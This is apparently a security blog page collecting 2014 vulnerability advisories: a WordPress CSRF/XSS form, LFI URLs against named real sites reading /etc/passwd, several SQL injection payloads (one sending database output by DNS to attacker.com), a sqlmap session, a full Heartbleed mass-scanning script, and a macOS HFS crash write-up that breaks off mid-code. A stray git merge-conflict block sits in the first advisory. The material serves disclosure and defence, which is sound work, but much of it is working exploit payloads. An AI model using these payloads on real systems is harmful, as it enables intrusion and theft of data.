MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

23Apr/140

WordPress Quick Page/Post Redirect Plugin 5.0.3 CSRF / XSS

Details
================
Software: Quick Page/Post Redirect Plugin
Version: 5.0.3
Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
Advisory ID: dxw-1970-1091
CVE: CVE-2014-2598
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
 
Description
================
CSRF and stored XSS in Quick Page/Post Redirect Plugin
 
Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attacker’s choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admin’s browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins.
 
Proof of concept
================
Use the following form to introduce potentially malicious JavaScript:
<form method=\"POST\" action=\"http://localhost/wp-admin/admin.php?page=redirect-updates\">
  <input type=\"text\" name=\"quickppr_redirects[request][]\" value=\""><script>alert(1)</script>\">
  <input type=\"text\" name=\"quickppr_redirects[destination][]\" value=\"http://dxw.com/\">
  <Input type=\"text\" name=\"submit_301\" value=\"1\">
  <input type=\"submit\">
</form>
 
Mitigations
================
Upgrade to version 5.0.5 or later.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report with 14 days.
 
Timeline
================
 
2014-03-21: Discovered
2014-03-24: Reported to plugins@wordpress.org
2014-04-07: No response; requested an alternative email address using the author’s contact form.
2014-04-08: Re-reported direct to author
2014-04-08: Author responded, and publication agreed on or before 2014-05-06
2014-04-10: Author reports issue fixed in version 5.0.5
 
<<<<<<< HEAD
 
Discovered by dxw:
================
Tom Adams
=======
 
Discovered by dxw:
================
Tom Adams
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
Please visit security.dxw.com for more information.

(27)

23Apr/140

WordPress LineNity Local File Inclusion

[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] 
[+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
         http://SITE/wp-content/themes/linenity/functions/download.php?imgurl=download.php

(18)

16Apr/140

mAdserve SQL Injection

Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in mAdserve, which can be 
exploited to execute arbitrary SQL commands in application’s database and compromise vulnerable website.
 
 
1) SQL Injection in mAdserve: CVE-2014-2654
 
1.1 The vulnerability exists due to insufficient sanitization of user Input passed via the "id" HTTP GET parameter to 
"/www/cp/edit_ad_unit.php" script. A remote authenticated attacker can inject and execute arbitrary SQL commands in 
application’s database and gain complete control over the application.  
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/edit_ad_unit.php?id=1%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,version%28%29,13,14,15,16,17%20--%202
 
 
1.2 Input passed via the "id" HTTP GET parameter to "/www/cp/view_adunits.php" script is not properly sanitised before 
being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in 
application’s database and gain complete control over the application. 
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/view_adunits.php?id=1%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%202
 
 
1.3 Input passed via the "id" HTTP GET parameter to "/www/cp/edit_campaign.php" script is not properly sanitised before 
being used in a SQL query. A remote authenticated attacker can inject and execute arbitrary SQL commands in 
application’s database and gain complete control over the application.
 
The exploitation example below displays version of MySQL server:
 
http://[host]/www/cp/edit_campaign.php?id=1%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20--%202
 
 
Successful exploitation of these vulnerabilities requires the attacker to have an account and to be logged in. User 
accounts are manually created by mAdserve administrator. 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Vendor did not reply to 3 notifications by email, 3 notifications via contact form, 1 notification via twitter. 
Currently we are not aware of any official solution for this vulnerability.
 
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: 
https://www.htbridge.com/advisory/HTB23209-patch.zip
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23209 - https://www.htbridge.com/advisory/HTB23209 - SQL Injection in mAdserve.
[2] mAdserve - http://www.madserve.org/ - The Open Source Mobile Ad Server for Publishers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment 
solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(147)

15Apr/140

Should openssl accept weak DSA/DH keys with g = +/- 1 ?

openssl accepts DSA (and probably DH) keys with
g=1 (or g= -1). Both are extremely weak, in
practice plaintext.
 
g=1 works all the time
g= -1 works about half the time in DSA
(on vanilla openssl).
 
Is there a MITM implication in this,
e.g. can a MITM convince both parties
that g=1 -- in this case the private keys
won't matter in DH.
 
Attached are certs.
$ openssl x509 -text -in certg=1.pem
G:    1 (0x1)
 
#server
$openssl s_server -accept 8888 -cert ./certg=1.pem -key certg=1.key -CAfile ./cacert.pem -www
 
#client
$ openssl s_client -connect localhost:8888 -showcerts -CAfile cacert.pem
Verify return code: 0 (ok)
 
-- 
blog:  https://j.ludost.net/blog

(99)

14Apr/140

heartbleed-masstest POC

#!/usr/bin/env python
 
# Based on the original code by Jared Stafford.
 
# NOTE: this code has been modified to test for OpenSSL versions vulnerable to 
# Heartbleed without exploiting the server, therefore the heartbeat request
# does _not_ cause the server to leak any data from memory or expose any data
# in an unauthorized manner.
# Based on: https://github.com/dchan/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
# See: https://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-without-exploiting-the-server/
 
# Usage example: python ssltest.py example.com
 
import sys
import struct
import socket
import time
import select
import re
import threading
import netaddr
import json
import os
import datetime
import signal
from optparse import OptionParser
from collections import defaultdict
from multiprocessing.dummy import Pool
 
host_status = {}
hosts_to_skip = []
counter = defaultdict(int)
lock = threading.Lock()
 
options = OptionParser(usage='%prog <network> [network2] [network3] ...', description='Test for SSL heartbleed vulnerability (CVE-2014-0160) on multiple domains')
options.add_option('--input', '-i', dest="input_file", default=[], action="append", help="Optional input file of networks or ip addresses, one address per line")
options.add_option('--logfile', '-o', dest="log_file", default="results.txt", help="Optional logfile destination")
options.add_option('--resume', dest="resume", action="store_true", default=False, help="Do not rescan hosts that are already in the logfile")
options.add_option('--timeout', '-t', dest="timeout", default=5, help="How long to wait for remote host to respond before timing out")
options.add_option('--threads', dest="threads", default=100, help="If specific, run X concurrent threads")
options.add_option('--json', dest="json_file", default=None, help="Save data as json into this file")
options.add_option('--only-vulnerable', dest="only_vulnerable", action="store_true", default=False, help="Only scan hosts that have been scanned before and were vulnerable")
options.add_option('--only-unscanned', dest="only_unscanned", action="store_true", default=False, help="Only scan hosts that appear in the json file but have not been scanned")
options.add_option('--summary', dest="summary", action="store_true", default=False, help="Useful with --json. Don't scan, just print old results")
options.add_option('--verbose', dest="verbose", action="store_true", default=False, help="Print verbose information to screen")
options.add_option('--max', dest="max", default=None, help="Exit program after scanning X hosts. Useful with --only-unscanned")
opts, args = options.parse_args()
 
threadpool = Pool(processes=int(opts.threads))
 
 
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
 
hello = h2bin('''
16 03 03 00  dc 01 00 00 d8 03 03 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            try:
                data = s.recv(remain)
            except Exception, e:
                return None
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
 
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
    return typ, ver, pay
 
 
def hit_hb(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return False
 
        if typ == 24:
            return True
 
        if typ == 21:
            return False
 
 
def is_vulnerable(host, timeout):
    """ Check if remote host is vulnerable to heartbleed
 
     Returns:
        None  -- If remote host has no ssl
        False -- Remote host has ssl but likely not vulnerable
        True  -- Remote host might be vulnerable
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(int(timeout))
    try:
        s.connect((host, 443))
    except Exception, e:
        return None
    s.send(hello)
 
    hbpkt = h2bin("01 4e 20") + "\x01"*20000
    hb = h2bin("18 03 03 40 00") + hbpkt[0:16384] + \
            h2bin("18 03 03 0e 23") + hbpkt[16384:]
 
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return None
 
        # copy ssl version from server to heartbeat request packet
        hb=hb[:2] + chr(ver&0xff) + hb[3:]
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    s.send(hb)
    return hit_hb(s)
 
 
def store_results(host_name, current_status):
    current_time = time.time()
    with lock:
        counter[current_status] += 1
        counter["Total"] += 1
        if host_name not in host_status:
            host_status[host_name] = {}
        host = host_status[host_name]
        # Make a note when this host was last scanned
        host['last_scan'] = current_time
 
        # Make a note if this host has never been scanned before
        if 'first_scan' not in host:
            host['first_scan'] = current_time
        elif host.get('status', 'never been scanned') != current_status:
            # If it has a different check result from before
            host['changelog'] = host.get('changelog', [])
            changelog_entry = [current_time, current_status]
            host['changelog'].append(changelog_entry)
        host['status'] = current_status
        with open(opts.log_file, 'a') as f:
            message = "{current_time} {host} {current_status}".format(**locals())
            f.write(message + "\n")
            return message
 
 
def scan_host(host):
    """ Scans a single host, logs into
 
    Returns:
        list(timestamp, ipaddress, vulnerabilitystatus)
    """
    if opts.max and int(opts.max) >= counter["Total"]:
        return
    host = str(host)
    if host in hosts_to_skip:
        return
    result = is_vulnerable(host, opts.timeout)
    message = store_results(host, result)
    if opts.verbose:
        print message
    return message
 
 
def scan_hostlist(hostlist, threads=5):
    """ Iterates through hostlist and scans them
 
    Arguments:
        hostlist    -- Iterable with ip addresses
        threads     -- If specified, run in multithreading mode
    """
    task = threadpool.map_async(scan_host, hostlist)
    while True:
        print counter['Total'], "hosts done"
        task.wait(1)
        if task.ready() or hasattr(threadpool, 'done'):
            return
    threadpool.close()
    threadpool.join()
 
 
def clean_hostlist(args):
    """ Returns list of iterables
    Examples:
    >>> hostlist = ["127.0.0.1", "127.0.0.2"]
    >>> clean_hostlist(hostlist)
    """
    hosts = []
    networks = []
    for i in args:
        # If it contains any alphanumerics, it might be a domain name
        if any(c.isalpha() for c in i):
            # Special hack, because alexa top x list is kind of weird
            i = i.split('/')[0]
            hosts.append(i)
        # If arg contains a / we assume its a network name
        elif '/' in i:
            networks.append(netaddr.IPNetwork(i))
        else:
            hosts.append(i)
    result = []
    for i in networks:
        result.append(i)
    if hosts:
        result.append(hosts)
    return result
 
 
def import_json(filename):
    """ Reads heartbleed data in json format from this file """
    with open(filename) as f:
        json_data = f.read()
    data = json.loads(json_data)
    for k, v in data.items():
        host_status[k] = v
 
 
def export_json(filename):
    """ Save scan results into filename as json data
    """
    json_data = json.dumps(host_status, indent=4)
    with open(filename, 'w') as f:
        f.write(json_data)
 
 
def print_summary():
    """ Print summary of previously stored json data to screen """
    if not opts.json_file:
        pass
        #options.error("You need to provide --json with --summary")
    else:
        import_json(opts.json_file)
    counter = defaultdict(int)
    for host, data in host_status.items():
        friendly_status = "unknown"
        status = data.get('status', "Not scanned")
        if status is None:
            friendly_status = "SSL Connection Failed"
        elif status is True:
            friendly_status = "Vulnerable"
        elif status is False:
            friendly_status = "Not Vulnerable"
        else:
            friendly_status = str(status)
        last_scan = int(float(data.get('last_scan',0)))
        last_scan = datetime.datetime.fromtimestamp(last_scan).strftime('%Y-%m-%d %H:%M:%S')
        counter[friendly_status] += 1
        counter['Total'] += 1
        if opts.only_vulnerable and not status:
            continue
        elif opts.only_unscanned and 'status' in data:
            continue
        print "%s %-20s %5s" % (last_scan, host, friendly_status)
    print "------------ summary -----------"
    for k,v in counter.items():
        print "%-7s %s" % (v, k)
    return
 
def signal_handler(signal, frame):
    print "Ctrl+C pressed.. aborting..."
    threadpool.terminate()
    threadpool.done = True
 
def main():
    if opts.summary:
        print_summary()
        return
 
    if not args and not opts.input_file and not opts.json_file:
        options.print_help()
        return
 
 
    # If any input files were provided, parse through them and add all addresses to "args"
    for input_file in opts.input_file:
        with open(input_file) as f:
            for line in f:
                words = line.split()
                if not words:
                    continue
                # If input file is in masscan's portscan format
                if line.startswith("Discovered open port"):
                    args.append(words.pop())
                elif len(words) == 1:
                    args.append(words[0])
                else:
                    print "Skipping invalid input line: " % line
                    continue
    if opts.json_file:
        try:
            import_json(opts.json_file)
        except IOError:
            print opts.json_file, "not found. Not importing any data"
 
 
        for host_name, data in host_status.items():
            if opts.only_unscanned and 'status' in data:
                continue
            if data.get('status', None) is True or not opts.only_vulnerable:
                args.append(host_name)
 
    # For every network in args, convert it to a netaddr network, so we can iterate through each host
    remote_networks = clean_hostlist(args)
    for network in remote_networks:
        scan_hostlist(network, threads=opts.threads)
 
    if opts.json_file:
        export_json(opts.json_file)
 
    print_summary()
 
if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)
    main()

(173)

10Apr/140

Orbit Open Ad Server SQL Injection

Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to 
perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control 
over the vulnerable website.
 
1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540
 
Input passed via the "site_directory_sort_field" HTTP POST parameter to "/guest/site_directory" URL is not properly 
sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.
 
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application 
is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other 
sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by 
the attacker):
 
 
<form action="http://[host]/guest/site_directory"; method="post" name="main">
<input type="hidden" name="active_form" value="site_directory_form">
<input type="hidden" name="ad_type_filter" value="text">
<input type="hidden" name="category_filter" value="1">
<input type="hidden" name="cost_model_filter" value="cpm">
<input type="hidden" name="form_mode" value="save">
<input type="hidden" name="image_size_filter" value="12">
<input type="hidden" name="keyword_filter" value="1">
<input type="hidden" name="site_directory_page" value="1">
<input type="hidden" name="site_directory_per_page" value="10">
<input type="hidden" name="site_directory_sort_direction" value="asc">
<input type="hidden" name="site_directory_sort_field" value="(select load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">
<input type="submit" id="btn">
</form>
 
 
The second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) 
technique to extract data from the database:
 
 
<form action="http://[host]/guest/site_directory"; method="post" name="main">
<input type="hidden" name="active_form" value="site_directory_form">
<input type="hidden" name="ad_type_filter" value="text">
<input type="hidden" name="category_filter" value="1">
<input type="hidden" name="cost_model_filter" value="cpm">
<input type="hidden" name="form_mode" value="save">
<input type="hidden" name="image_size_filter" value="12">
<input type="hidden" name="keyword_filter" value="1">
<input type="hidden" name="site_directory_page" value="1">
<input type="hidden" name="site_directory_per_page" value="10">
<input type="hidden" name="site_directory_sort_direction" value="asc">
<input type="hidden" name="site_directory_sort_field" value="(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, 
BENCHMARK(22000000,MD5(NOW()))))">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Orbit Open Ad Server 1.1.1
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad 
Server.
[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the 
profits while we manage the technology.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment 
solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(276)

10Apr/140

Sendy 1.1.9.1 – SQL Injection Vulnerability

Sendy contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /send-to script not 
properly sanitizing user-supplied input to the "c" parameter. This may allow a remote attacker to inject or manipulate 
SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
 
Proofs:
 
# sqlmap -u 'http://server1/send-to?i=1&c=10&apos; --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; 
logged_in=[logged_in value]" -p c -D sendy --tables
 
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end 
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not 
responsible for any misuse or damage caused by this program
 
[*] starting at 11:48:57
 
[11:48:57] [INFO] resuming back-end DBMS 'mysql'
[11:48:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: c=10 AND SLEEP(5)&i=1
---
 
[...]
 
Database: sendy
[9 tables]
+-------------+
| apps        |
| ares        |
| ares_emails |
| campaigns   |
| links       |
| lists       |
| login       |
| queue       |
| subscribers |
+-------------+

(255)

7Apr/140

MacOSX 10.9.2/XNU HFS Multiple Vulnerabilities

MacOSX/XNU HFS Multiple Vulnerabilities
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
 
===================
 
On November 8th, I've reported vulnerability in hard links for HFS+
(CVE-2013-6799)
 
http://cxsecurity.com/issue/WLB-2013110059
 
The HFS+ file system does not apply strict privilege rules during the
creating of hard links. The ability to create hard links to directories is
wrong implemented and such an issue is affecting os versions greater or
equal to 10.5. Officially Apple allows you to create hard links only for
your time machine. <see wiki> Vulnerability CVE-2013-6799 (incomplete fix
for CVE-2010-0105) allow to create hard link to directory and the number of
hard links may be freely high. To create N hard links, you must use a
special algorithm which creates links from the top of the file system tree.
This means that first we create the directory structure and once created we
need to go from up to down by creating hard links. The last time I've
mentioned of the possibility of a kernel crash by performing the 'ls'
command. This situation occurs in conjunction with the 'find' application.
 
Commands such as 'ls' behave in unexpected ways. Apple are going find this
crash point in code. To create huge hard links structure, use this code
 
http://cert.cx/stuff/l2.c
 
-----------------------------------
h1XSS:tysiak cx$ uname -a
Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16
19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64
h1xss:tysiak cx$ gcc -o l2 l2.c
h1xss:tysiak cx$ ./l2 1000
...
h1xss:tysiak cx$ cat loop.sh
#!/bin/bash
while [ 1 ] ; do
ls -laR B > /dev/null
done
 
h1xss:tysiak cx$ sh ./loop.sh
ls: B: No such file or directory
ls: X1: No such file or directory
...
ls: X8: Bad address
ls: X1: Bad address
ls: X2: Bad address
...
ls: X8: No such file or directory
./loop.sh: line 4:  8816 Segmentation fault: 11  ls -laR B > /dev/null
./loop.sh: line 4:  8818 Segmentation fault: 11  ls -laR B > /dev/null
ls: B: No such file or directory
ls: X1: No such file or directory
ls: X2: No such file or directory
...
ls: X1: No such file or directory
ls: X2: No such file or directory
-----------
...
-----------
Feb  9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for
ls[9418] version 230 to
/Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash
-----------
 
That what we can see here is unexpected behavior of LS command. LS process
is also affected for infinite loop (recursion?).
 
-----------
h1xss:tysiak cx$ ps -fp 8822
  UID   PID  PPID   C STIME   TTY           TIME CMD
  501  8822  8810   0  7:36   ttys002   62:19.65 ls -laR B
-----------
 
or used parallely with (find . > /dev/null) command cause a kernel crash
 
-----------
Mon Mar 31 20:30:41 2014
panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838,
type 13=general protection, registers:
CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c,
CR4: 0x00000000001606e0
RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000,
RDX: 0x0000000000000000
RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018,
RDI: 0xffffff802f23bcd0
R8:  0xffffff8140d9bc1c, R9:  0xffffff802f26e960, R10: 0xffffff8140d9ba2c,
R11: 0x0000000000000f92
R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0,
R15: 0xffffff802f26e960
RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:  0x0000000000000008,
SS:  0x0000000000000010
Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU:
0x0
 
Backtrace (CPU 0), Frame : Return Address
0xffffff811eee8c50 : 0xffffff8004422fa9
 
BSD process name corresponding to current thread: ls
-----------
 
XNU is the computer operating system kernel that Apple Inc. acquired and
developed for use in the Mac OS X operating system and released as free and
open source software as part of the Darwin operating system. We can try to
see HFS implementation code. Let's start static code analysys using
cifrex.org tool!
 
-1.---------------------------------------------------------
Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c
 
Code:
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c
 
--- hfs_vfsops.c ----------------------------
/*
 * HFS filesystem related variables.
 */
int
hfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t
*oldlenp,
user_addr_t newp, size_t newlen, vfs_context_t context)
{
...
       if ((newlen <= 0) || (newlen > MAXPATHLEN))
            return (EINVAL);
 
        bufsize = MAX(newlen * 3, MAXPATHLEN);
        MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
        if (filename == NULL) { <=====================================
filename CHECK
            error = ENOMEM;
            goto encodinghint_exit;
        }
        MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);
        if (filename == NULL) { <======================================
double CHECK?
            error = ENOMEM;
            goto encodinghint_exit;
        }
 
        error = copyin(newp, (caddr_t)filename, newlen);
        if (error == 0) {
            error = utf8_decodestr((u_int8_t *)filename, newlen - 1,
unicode_name,
                                   &bytes, bufsize, 0, UTF_DECOMPOSED);
            if (error == 0) {
                hint = hfs_pickencoding(unicode_name, bytes / 2);
                error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0,
(int32_t *)&hint);
            }
        }
--- hfs_vfsops.c----------------------------
 
Twice checking of 'filename' has no sense. Probably 'unicode_name' should
be checked in second condition.
 
 
-2.---------------------------------------------------------
Possible Buffer Overflow in resource fork (hfs_vnops.c)
 
Unverified value returned by snprintf() may be bigger as a declared buffer
(MAXPATHLEN).
 
 
https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html
---
The snprintf() and vsnprintf() functions will write at most n-1 of the
characters printed into the out-put output
     put string (the n'th character then gets the terminating `\0'); if the
return value is greater than or
     equal to the n argument, the string was too short and some of the
printed characters were discarded.
     The output is always null-terminated.
---
 
 
Code:
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c
 
--- hfs_vnops.c ----------------------------
...
/*
 * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode
that is
 * found in 'vp'.  The rsrc fork vnode is returned with the cnode locked
and iocount
 * on the rsrc vnode.
 *
 ...
 */
 
int
hfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,
int can_drop_lock, int error_on_unlinked)
{
 
...
 
/*
 * Supply hfs_getnewvnode with a component name.
 */
cn.cn_pnbuf = NULL;
if (descptr->cd_nameptr) {
            MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI,
M_WAITOK);
            cn.cn_nameiop = LOOKUP;
            cn.cn_flags = ISLASTCN | HASBUF;
            cn.cn_context = NULL;
            cn.cn_pnlen = MAXPATHLEN;
            cn.cn_nameptr = cn.cn_pnbuf;
            cn.cn_hash = 0;
            cn.cn_consume = 0;
            cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,
<================
                         "%s%s", descptr->cd_nameptr,
                         _PATH_RSRCFORKSPEC);
        }
        dvp = vnode_getparent(vp);
        error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL,
<================
                                descptr, GNV_WANTRSRC | GNV_SKIPLOCK,
&cp->c_attr,
                                &rsrcfork, &rvp, &newvnode_flags);
 
--- hfs_vnops.c ----------------------------
 
Pattern is '%s%s' where sum of length descptr->cd_nameptr and
_PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN).
Size of descptr->cd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is
 
  #define _PATH_RSRCFORKSPEC     "/..namedfork/rsrc"
 
where length is 17 chars. Possible up to 17 chars overflow here?.
 
Now let's see hfs_getnewvnode function
 
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c
 
--- hfs_cnode.c ----------------------------
hfs_getnewvnode(
    struct hfsmount *hfsmp,
    struct vnode *dvp,
    struct componentname *cnp, <======== WATCH THIS
    struct cat_desc *descp,
    int flags,
    struct cat_attr *attrp,
    struct cat_fork *forkp,
    struct vnode **vpp,
    int *out_flags)
{
...
                if ((*vpp != NULL) && (cnp)) {
                    /* we could be requesting the rsrc of a hardlink
file... */
                    vnode_update_identity (*vpp, dvp, cnp->cn_nameptr,
cnp->cn_namelen, cnp->cn_hash, <== NAMELEN HERE
                            (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));
...
--- hfs_cnode.c ----------------------------
 
and call to vnode_update_indentity()
 
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c
 
 
--- vfs_cache.c ----------------------------
void
vnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int
name_len, uint32_t name_hashval, int flags)
{
...
    if ( (flags & VNODE_UPDATE_NAME) ) {
        if (name != vp->v_name) {
            if (name && *name) {
                if (name_len == 0)
                    name_len = strlen(name);
                tname = vfs_addname(name, name_len, name_hashval, 0); <==
NAMELEN HERE
            }
        } else
            flags &= ~VNODE_UPDATE_NAME;
    }
...
const char *
vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)
{
